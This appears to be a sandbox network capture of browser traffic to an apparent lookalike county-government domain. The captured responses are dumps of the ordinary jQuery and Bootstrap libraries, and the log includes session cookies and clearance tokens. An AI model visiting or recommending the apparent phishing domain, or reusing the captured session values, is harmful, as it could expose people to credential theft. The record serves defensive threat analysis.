                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://sanbernardinoscounty.telcom-info.com/&redirect=748a7e906055260effecf777292e4da84f206e0fmain&uid=f253efe302d32ab264a76e0ce65be76966fc7b00337d8
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: PHPSESSID=d2b586c48e6c37e4b46c75c985eb61c5; cf_clearance=WI3_X5Q8DqvBE7vRfDhgGrfo36.yzEAQnX7Fkgx1WLQ-1727822588-1.2.1.1-yVg.R8iXsSEyCdH6mpk7OwykeKWYET9_iK56vfB.G.m9J4LJqn2mjEGUcz_hgM6junbyj03Eoeyxghf7DKwQjnOHT_RV.dkyB8YOhZsRNoePwI64pJc2MVeitRkAjjMCWVl2FXYkhZ1d5WMaB4mbRLrIyh9e4TcPrwbqn58bq2kyq5mT_1oGYdVeO_3cvXt7CVTKoxVr8szlJlVf52OJy0NaLZzpmkKC87R2prCuqoJXWnwmag_1iRpA8JVYZTUVIx36Rn8K_V4I5xYC16R4Ea6wqGO2bZTTQXYUd7Ww2ArPF_on1ymBOKV6N_LGXJnc8r2nfHBk87oT30hKH5frHigjIy8ou5a2XpE4K4plr4D3fDah52V2p9j2UGAz6XwAu8c436H48fmfZT7BOzmQtT8s1xW6OSO7to8bPnw.0eUBWkz5qzk0jmBG3bn07J.o
                                                                          2024-10-01 22:43:13 UTC634INHTTP/1.1 200 OK
                                                                          Date: Tue, 01 Oct 2024 22:43:13 GMT
                                                                          Content-Type: text/javascript
                                                                          Content-Length: 85578
                                                                          Connection: close
                                                                          Last-Modified: Tue, 01 Oct 2024 20:49:23 GMT
                                                                          Accept-Ranges: bytes
                                                                          CF-Cache-Status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=404Vq1%2FCK%2FLHkYosvdqG6KzJAzmM0Rx7uvE9IzFT9%2Fct7zBm6epJ6qqPl2lMjoRt32%2FVsDoDN5%2F8Eqp6ZvTbI%2FkltSiWcQqwt7lxt2%2FbN2ynvsvqmdWbVMyizIviFJsQixER2UjB3UNCj4w02do9S3C4qx3QynI%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8cbff869dc660f37-EWR
                                                                          2024-10-01 22:43:13 UTC735INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 32 2e 32 2e 34 20 7c 20 28 63 29 20 6a 51 75 65 72 79 20 46 6f 75 6e 64 61 74 69 6f 6e 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 61 2e 64 6f 63 75 6d 65 6e 74 3f 62 28 61 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 21 61 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72 65 71 75 69 72 65 73 20 61 20 77 69 6e 64 6f 77 20 77 69 74 68 20 61 20 64 6f 63 75 6d 65 6e
                                                                          Data Ascii: /*! jQuery v2.2.4 | (c) jQuery Foundation | jquery.org/license */!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a documen
                                                                          2024-10-01 22:43:13 UTC1369INData Raw: 69 73 5b 61 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 61 5d 3a 65 2e 63 61 6c 6c 28 74 68 69 73 29 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 6e 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 61 29 3b 72 65 74 75 72 6e 20 62 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 62 2e 63 6f 6e 74 65 78 74 3d 74 68 69 73 2e 63 6f 6e 74 65 78 74 2c 62 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 2e 65 61 63 68 28 74 68 69 73 2c 61 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 6e 2e 6d 61 70 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 72 65 74
                                                                          Data Ascii: is[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){ret
                                                                          2024-10-01 22:43:13 UTC1369INData Raw: 61 72 73 65 46 6c 6f 61 74 28 62 29 2b 31 3e 3d 30 7d 2c 69 73 50 6c 61 69 6e 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3b 69 66 28 22 6f 62 6a 65 63 74 22 21 3d 3d 6e 2e 74 79 70 65 28 61 29 7c 7c 61 2e 6e 6f 64 65 54 79 70 65 7c 7c 6e 2e 69 73 57 69 6e 64 6f 77 28 61 29 29 72 65 74 75 72 6e 21 31 3b 69 66 28 61 2e 63 6f 6e 73 74 72 75 63 74 6f 72 26 26 21 6b 2e 63 61 6c 6c 28 61 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 21 6b 2e 63 61 6c 6c 28 61 2e 63 6f 6e 73 74 72 75 63 74 6f 72 2e 70 72 6f 74 6f 74 79 70 65 7c 7c 7b 7d 2c 22 69 73 50 72 6f 74 6f 74 79 70 65 4f 66 22 29 29 72 65 74 75 72 6e 21 31 3b 66 6f 72 28 62 20 69 6e 20 61 29 3b 72 65 74 75 72 6e 20 76 6f 69 64 20 30 3d 3d 3d 62 7c 7c 6b 2e 63 61 6c 6c 28
                                                                          Data Ascii: arseFloat(b)+1>=0},isPlainObject:function(a){var b;if("object"!==n.type(a)||a.nodeType||n.isWindow(a))return!1;if(a.constructor&&!k.call(a,"constructor")&&!k.call(a.constructor.prototype||{},"isPrototypeOf"))return!1;for(b in a);return void 0===b||k.call(
                                                                          2024-10-01 22:43:13 UTC1369INData Raw: 20 64 2c 65 2c 67 3d 30 2c 68 3d 5b 5d 3b 69 66 28 73 28 61 29 29 66 6f 72 28 64 3d 61 2e 6c 65 6e 67 74 68 3b 64 3e 67 3b 67 2b 2b 29 65 3d 62 28 61 5b 67 5d 2c 67 2c 63 29 2c 6e 75 6c 6c 21 3d 65 26 26 68 2e 70 75 73 68 28 65 29 3b 65 6c 73 65 20 66 6f 72 28 67 20 69 6e 20 61 29 65 3d 62 28 61 5b 67 5d 2c 67 2c 63 29 2c 6e 75 6c 6c 21 3d 65 26 26 68 2e 70 75 73 68 28 65 29 3b 72 65 74 75 72 6e 20 66 2e 61 70 70 6c 79 28 5b 5d 2c 68 29 7d 2c 67 75 69 64 3a 31 2c 70 72 6f 78 79 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 2c 64 2c 66 3b 72 65 74 75 72 6e 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 62 26 26 28 63 3d 61 5b 62 5d 2c 62 3d 61 2c 61 3d 63 29 2c 6e 2e 69 73 46 75 6e 63 74 69 6f 6e 28 61 29 3f 28 64 3d 65 2e 63 61 6c 6c 28
                                                                          Data Ascii: d,e,g=0,h=[];if(s(a))for(d=a.length;d>g;g++)e=b(a[g],g,c),null!=e&&h.push(e);else for(g in a)e=b(a[g],g,c),null!=e&&h.push(e);return f.apply([],h)},guid:1,proxy:function(a,b){var c,d,f;return"string"==typeof b&&(c=a[b],b=a,a=c),n.isFunction(a)?(d=e.call(
                                                                          2024-10-01 22:43:13 UTC1369INData Raw: 22 29 29 7c 29 22 2b 4c 2b 22 2a 5c 5c 5d 22 2c 4f 3d 22 3a 28 22 2b 4d 2b 22 29 28 3f 3a 5c 5c 28 28 28 27 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 27 5d 29 2a 29 27 7c 5c 22 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 5c 22 5d 29 2a 29 5c 22 29 7c 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 28 29 5b 5c 5c 5d 5d 7c 22 2b 4e 2b 22 29 2a 29 7c 2e 2a 29 5c 5c 29 7c 29 22 2c 50 3d 6e 65 77 20 52 65 67 45 78 70 28 4c 2b 22 2b 22 2c 22 67 22 29 2c 51 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 4c 2b 22 2b 7c 28 28 3f 3a 5e 7c 5b 5e 5c 5c 5c 5c 5d 29 28 3f 3a 5c 5c 5c 5c 2e 29 2a 29 22 2b 4c 2b 22 2b 24 22 2c 22 67 22 29 2c 52 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 4c 2b 22 2a 2c 22 2b 4c 2b 22 2a 22 29 2c 53 3d 6e 65 77 20 52 65 67
                                                                          Data Ascii: "))|)"+L+"*\\]",O=":("+M+")(?:\\((('((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\")|((?:\\\\.|[^\\\\()[\\]]|"+N+")*)|.*)\\)|)",P=new RegExp(L+"+","g"),Q=new RegExp("^"+L+"+|((?:^|[^\\\\])(?:\\\\.)*)"+L+"+$","g"),R=new RegExp("^"+L+"*,"+L+"*"),S=new Reg
                                                                          2024-10-01 22:43:13 UTC1369INData Raw: 28 61 5b 63 2b 2b 5d 3d 62 5b 64 2b 2b 5d 29 3b 61 2e 6c 65 6e 67 74 68 3d 63 2d 31 7d 7d 7d 66 75 6e 63 74 69 6f 6e 20 66 61 28 61 2c 62 2c 64 2c 65 29 7b 76 61 72 20 66 2c 68 2c 6a 2c 6b 2c 6c 2c 6f 2c 72 2c 73 2c 77 3d 62 26 26 62 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2c 78 3d 62 3f 62 2e 6e 6f 64 65 54 79 70 65 3a 39 3b 69 66 28 64 3d 64 7c 7c 5b 5d 2c 22 73 74 72 69 6e 67 22 21 3d 74 79 70 65 6f 66 20 61 7c 7c 21 61 7c 7c 31 21 3d 3d 78 26 26 39 21 3d 3d 78 26 26 31 31 21 3d 3d 78 29 72 65 74 75 72 6e 20 64 3b 69 66 28 21 65 26 26 28 28 62 3f 62 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 62 3a 76 29 21 3d 3d 6e 26 26 6d 28 62 29 2c 62 3d 62 7c 7c 6e 2c 70 29 29 7b 69 66 28 31 31 21 3d 3d 78 26 26 28 6f 3d 24 2e 65 78 65 63 28 61 29 29 29 69
                                                                          Data Ascii: (a[c++]=b[d++]);a.length=c-1}}}function fa(a,b,d,e){var f,h,j,k,l,o,r,s,w=b&&b.ownerDocument,x=b?b.nodeType:9;if(d=d||[],"string"!=typeof a||!a||1!==x&&9!==x&&11!==x)return d;if(!e&&((b?b.ownerDocument||b:v)!==n&&m(b),b=b||n,p)){if(11!==x&&(o=$.exec(a)))i
                                                                          2024-10-01 22:43:13 UTC1369INData Raw: 74 72 48 61 6e 64 6c 65 5b 63 5b 65 5d 5d 3d 62 7d 66 75 6e 63 74 69 6f 6e 20 6b 61 28 61 2c 62 29 7b 76 61 72 20 63 3d 62 26 26 61 2c 64 3d 63 26 26 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 26 26 31 3d 3d 3d 62 2e 6e 6f 64 65 54 79 70 65 26 26 28 7e 62 2e 73 6f 75 72 63 65 49 6e 64 65 78 7c 7c 43 29 2d 28 7e 61 2e 73 6f 75 72 63 65 49 6e 64 65 78 7c 7c 43 29 3b 69 66 28 64 29 72 65 74 75 72 6e 20 64 3b 69 66 28 63 29 77 68 69 6c 65 28 63 3d 63 2e 6e 65 78 74 53 69 62 6c 69 6e 67 29 69 66 28 63 3d 3d 3d 62 29 72 65 74 75 72 6e 2d 31 3b 72 65 74 75 72 6e 20 61 3f 31 3a 2d 31 7d 66 75 6e 63 74 69 6f 6e 20 6c 61 28 61 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 62 29 7b 76 61 72 20 63 3d 62 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61
                                                                          Data Ascii: trHandle[c[e]]=b}function ka(a,b){var c=b&&a,d=c&&1===a.nodeType&&1===b.nodeType&&(~b.sourceIndex||C)-(~a.sourceIndex||C);if(d)return d;if(c)while(c=c.nextSibling)if(c===b)return-1;return a?1:-1}function la(a){return function(b){var c=b.nodeName.toLowerCa
                                                                          2024-10-01 22:43:13 UTC1369INData Raw: 2e 6c 65 6e 67 74 68 7d 29 2c 63 2e 67 65 74 42 79 49 64 3f 28 64 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 62 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 70 29 7b 76 61 72 20 63 3d 62 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 61 29 3b 72 65 74 75 72 6e 20 63 3f 5b 63 5d 3a 5b 5d 7d 7d 2c 64 2e 66 69 6c 74 65 72 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 61 2e 72 65 70 6c 61 63 65 28 62 61 2c 63 61 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 3d 3d 3d 62 7d 7d 29 3a 28 64 65 6c 65 74 65 20 64 2e 66 69 6e 64 2e 49 44 2c 64 2e 66
                                                                          Data Ascii: .length}),c.getById?(d.find.ID=function(a,b){if("undefined"!=typeof b.getElementById&&p){var c=b.getElementById(a);return c?[c]:[]}},d.filter.ID=function(a){var b=a.replace(ba,ca);return function(a){return a.getAttribute("id")===b}}):(delete d.find.ID,d.f
                                                                          2024-10-01 22:43:13 UTC1369INData Raw: 29 2c 69 61 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 6e 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6e 70 75 74 22 29 3b 62 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 74 79 70 65 22 2c 22 68 69 64 64 65 6e 22 29 2c 61 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 62 29 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 6e 61 6d 65 22 2c 22 44 22 29 2c 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 6e 61 6d 65 3d 64 5d 22 29 2e 6c 65 6e 67 74 68 26 26 71 2e 70 75 73 68 28 22 6e 61 6d 65 22 2b 4c 2b 22 2a 5b 2a 5e 24 7c 21 7e 5d 3f 3d 22 29 2c 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 65 6e 61 62 6c 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 71 2e 70 75 73 68 28 22 3a 65 6e 61 62 6c 65 64 22 2c 22 3a 64 69 73 61
                                                                          Data Ascii: ),ia(function(a){var b=n.createElement("input");b.setAttribute("type","hidden"),a.appendChild(b).setAttribute("name","D"),a.querySelectorAll("[name=d]").length&&q.push("name"+L+"*[*^$|!~]?="),a.querySelectorAll(":enabled").length||q.push(":enabled",":disa
                                                                          2024-10-01 22:43:13 UTC1369INData Raw: 21 66 29 72 65 74 75 72 6e 20 61 3d 3d 3d 6e 3f 2d 31 3a 62 3d 3d 3d 6e 3f 31 3a 65 3f 2d 31 3a 66 3f 31 3a 6b 3f 4a 28 6b 2c 61 29 2d 4a 28 6b 2c 62 29 3a 30 3b 69 66 28 65 3d 3d 3d 66 29 72 65 74 75 72 6e 20 6b 61 28 61 2c 62 29 3b 63 3d 61 3b 77 68 69 6c 65 28 63 3d 63 2e 70 61 72 65 6e 74 4e 6f 64 65 29 67 2e 75 6e 73 68 69 66 74 28 63 29 3b 63 3d 62 3b 77 68 69 6c 65 28 63 3d 63 2e 70 61 72 65 6e 74 4e 6f 64 65 29 68 2e 75 6e 73 68 69 66 74 28 63 29 3b 77 68 69 6c 65 28 67 5b 64 5d 3d 3d 3d 68 5b 64 5d 29 64 2b 2b 3b 72 65 74 75 72 6e 20 64 3f 6b 61 28 67 5b 64 5d 2c 68 5b 64 5d 29 3a 67 5b 64 5d 3d 3d 3d 76 3f 2d 31 3a 68 5b 64 5d 3d 3d 3d 76 3f 31 3a 30 7d 2c 6e 29 3a 6e 7d 2c 66 61 2e 6d 61 74 63 68 65 73 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29
                                                                          Data Ascii: !f)return a===n?-1:b===n?1:e?-1:f?1:k?J(k,a)-J(k,b):0;if(e===f)return ka(a,b);c=a;while(c=c.parentNode)g.unshift(c);c=b;while(c=c.parentNode)h.unshift(c);while(g[d]===h[d])d++;return d?ka(g[d],h[d]):g[d]===v?-1:h[d]===v?1:0},n):n},fa.matches=function(a,b)


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          37192.168.2.649777104.21.55.674434864C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-01 22:43:13 UTC1288OUTGET /b_/66fc7b007c246-b860da8ffc87dc502860e1b645c22d2f HTTP/1.1
                                                                          Host: sanbernardinoscounty.telcom-info.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://sanbernardinoscounty.telcom-info.com/&redirect=748a7e906055260effecf777292e4da84f206e0fmain&uid=f253efe302d32ab264a76e0ce65be76966fc7b00337d8
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: PHPSESSID=d2b586c48e6c37e4b46c75c985eb61c5; cf_clearance=WI3_X5Q8DqvBE7vRfDhgGrfo36.yzEAQnX7Fkgx1WLQ-1727822588-1.2.1.1-yVg.R8iXsSEyCdH6mpk7OwykeKWYET9_iK56vfB.G.m9J4LJqn2mjEGUcz_hgM6junbyj03Eoeyxghf7DKwQjnOHT_RV.dkyB8YOhZsRNoePwI64pJc2MVeitRkAjjMCWVl2FXYkhZ1d5WMaB4mbRLrIyh9e4TcPrwbqn58bq2kyq5mT_1oGYdVeO_3cvXt7CVTKoxVr8szlJlVf52OJy0NaLZzpmkKC87R2prCuqoJXWnwmag_1iRpA8JVYZTUVIx36Rn8K_V4I5xYC16R4Ea6wqGO2bZTTQXYUd7Ww2ArPF_on1ymBOKV6N_LGXJnc8r2nfHBk87oT30hKH5frHigjIy8ou5a2XpE4K4plr4D3fDah52V2p9j2UGAz6XwAu8c436H48fmfZT7BOzmQtT8s1xW6OSO7to8bPnw.0eUBWkz5qzk0jmBG3bn07J.o
                                                                          2024-10-01 22:43:13 UTC624INHTTP/1.1 200 OK
                                                                          Date: Tue, 01 Oct 2024 22:43:13 GMT
                                                                          Content-Type: text/javascript
                                                                          Content-Length: 51039
                                                                          Connection: close
                                                                          Last-Modified: Tue, 01 Oct 2024 20:49:23 GMT
                                                                          Accept-Ranges: bytes
                                                                          CF-Cache-Status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sdorPfYhRnCPDz2JXdnskA6l%2B3Vj0W5r4BtEJHBvUgp70I62DDIjpLI79JFUzSLlfHQ%2BU242sMoFRaNBgPoPVcwV4FYSCPmNqbBaaniqsWJG4Mn77CQB9ddTk42TbwEsQiPqblfbazGKmP6nVBnoG5xgtAjCTeM%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8cbff86a0f8443a5-EWR
                                                                          2024-10-01 22:43:13 UTC745INData Raw: 2f 2a 21 0a 20 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 34 2e 31 2e 33 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 2f 29 0a 20 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 38 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 67 72 61 70 68 73 2f 63 6f 6e 74 72 69 62 75 74 6f 72 73 29 0a 20 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 29 0a 20 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22
                                                                          Data Ascii: /*! * Bootstrap v4.1.3 (https://getbootstrap.com/) * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors) * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) */!function(t,e){"
                                                                          2024-10-01 22:43:13 UTC1369INData Raw: 7b 66 6f 72 28 76 61 72 20 74 3d 31 3b 74 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 74 2b 2b 29 7b 76 61 72 20 6f 3d 6e 75 6c 6c 21 3d 61 72 67 75 6d 65 6e 74 73 5b 74 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 74 5d 3a 7b 7d 2c 65 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 6f 29 3b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 26 26 28 65 3d 65 2e 63 6f 6e 63 61 74 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 6f 29 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 6f 2c 74 29 2e 65 6e 75 6d
                                                                          Data Ascii: {for(var t=1;t<arguments.length;t++){var o=null!=arguments[t]?arguments[t]:{},e=Object.keys(o);"function"==typeof Object.getOwnPropertySymbols&&(e=e.concat(Object.getOwnPropertySymbols(o).filter(function(t){return Object.getOwnPropertyDescriptor(o,t).enum
                                                                          2024-10-01 22:43:13 UTC1369INData Raw: 46 72 6f 6d 45 6c 65 6d 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 74 61 72 67 65 74 22 29 3b 65 26 26 22 23 22 21 3d 3d 65 7c 7c 28 65 3d 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 68 72 65 66 22 29 7c 7c 22 22 29 3b 74 72 79 7b 72 65 74 75 72 6e 20 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 65 29 3f 65 3a 6e 75 6c 6c 7d 63 61 74 63 68 28 74 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 7d 2c 67 65 74 54 72 61 6e 73 69 74 69 6f 6e 44 75 72 61 74 69 6f 6e 46 72 6f 6d 45 6c 65 6d 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 21 74 29 72 65 74 75 72 6e 20 30 3b 76 61 72 20 65 3d 69 28 74 29 2e 63 73 73 28 22 74 72 61 6e 73 69 74 69 6f
                                                                          Data Ascii: FromElement:function(t){var e=t.getAttribute("data-target");e&&"#"!==e||(e=t.getAttribute("href")||"");try{return document.querySelector(e)?e:null}catch(t){return null}},getTransitionDurationFromElement:function(t){if(!t)return 0;var e=i(t).css("transitio
                                                                          2024-10-01 22:43:13 UTC1369INData Raw: 65 6e 74 28 65 29 2e 69 73 44 65 66 61 75 6c 74 50 72 65 76 65 6e 74 65 64 28 29 7c 7c 74 68 69 73 2e 5f 72 65 6d 6f 76 65 45 6c 65 6d 65 6e 74 28 65 29 7d 2c 74 2e 64 69 73 70 6f 73 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 2e 72 65 6d 6f 76 65 44 61 74 61 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 2c 6f 29 2c 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 3d 6e 75 6c 6c 7d 2c 74 2e 5f 67 65 74 52 6f 6f 74 45 6c 65 6d 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 46 6e 2e 67 65 74 53 65 6c 65 63 74 6f 72 46 72 6f 6d 45 6c 65 6d 65 6e 74 28 74 29 2c 6e 3d 21 31 3b 72 65 74 75 72 6e 20 65 26 26 28 6e 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 65 29 29 2c 6e 7c 7c 28 6e 3d 72 28 74 29 2e 63 6c 6f 73 65 73 74 28 22 2e
                                                                          Data Ascii: ent(e).isDefaultPrevented()||this._removeElement(e)},t.dispose=function(){r.removeData(this._element,o),this._element=null},t._getRootElement=function(t){var e=Fn.getSelectorFromElement(t),n=!1;return e&&(n=document.querySelector(e)),n||(n=r(t).closest(".
                                                                          2024-10-01 22:43:13 UTC1369INData Raw: 55 53 5f 42 4c 55 52 5f 44 41 54 41 5f 41 50 49 3a 28 53 3d 22 66 6f 63 75 73 22 29 2b 79 2b 45 2b 22 20 62 6c 75 72 22 2b 79 2b 45 7d 2c 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 6e 28 74 29 7b 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 3d 74 7d 76 61 72 20 74 3d 6e 2e 70 72 6f 74 6f 74 79 70 65 3b 72 65 74 75 72 6e 20 74 2e 74 6f 67 67 6c 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 21 30 2c 65 3d 21 30 2c 6e 3d 6d 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 63 6c 6f 73 65 73 74 28 41 29 5b 30 5d 3b 69 66 28 6e 29 7b 76 61 72 20 69 3d 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 44 29 3b 69 66 28 69 29 7b 69 66 28 22 72 61 64 69 6f 22 3d 3d 3d 69 2e 74 79 70 65 29 69 66 28 69 2e
                                                                          Data Ascii: US_BLUR_DATA_API:(S="focus")+y+E+" blur"+y+E},k=function(){function n(t){this._element=t}var t=n.prototype;return t.toggle=function(){var t=!0,e=!0,n=m(this._element).closest(A)[0];if(n){var i=this._element.querySelector(D);if(i){if("radio"===i.type)if(i.
